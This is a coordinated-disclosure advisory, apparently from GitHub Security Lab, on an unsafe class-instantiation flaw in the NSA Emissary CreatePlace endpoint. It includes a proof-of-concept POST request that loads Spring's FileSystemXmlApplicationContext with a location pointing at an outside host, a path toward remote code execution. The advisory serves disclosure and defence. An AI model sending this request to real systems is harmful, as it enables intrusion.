Coordinated Disclosure Timeline
- 2021-04-27: Report sent to EmissarySupport@evoforge.org
- 2021-05-28: Advisory is published
A logged-in user can invoke the constructor of some classes with untrusted data.
National Security Agency Emissary
CreatePlace REST endpoint accepts an
sppClassName parameter which is used to load an arbitrary class. This class is later instantiated using a constructor with the following signature:
<constructor>(String, String, String). An attacker may find a gadget (class) in the application classpath that could be used to achieve Remote Code Execution (RCE) or disrupt the application.
POST /emissary/CreatePlace.action HTTP/1.1 Host: localhost:8001 x-requested-by: Content-Type: application/x-www-form-urlencoded Content-Length: 142 sppClassName=org.springframework.context.support.FileSystemXmlApplicationContext&sppLocation=bar.bar.bar.http%3A%2F%2Fbar.com&sppDirectory=foo
Even though the chances to find a gadget (class) that allow arbitrary code execution are low, an attacker can still find gadgets that could potentially crash the application or leak sensitive data.
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
You can contact the GHSL team at
email@example.com, please include a reference to
GHSL-2021-073 in any communication regarding this issue.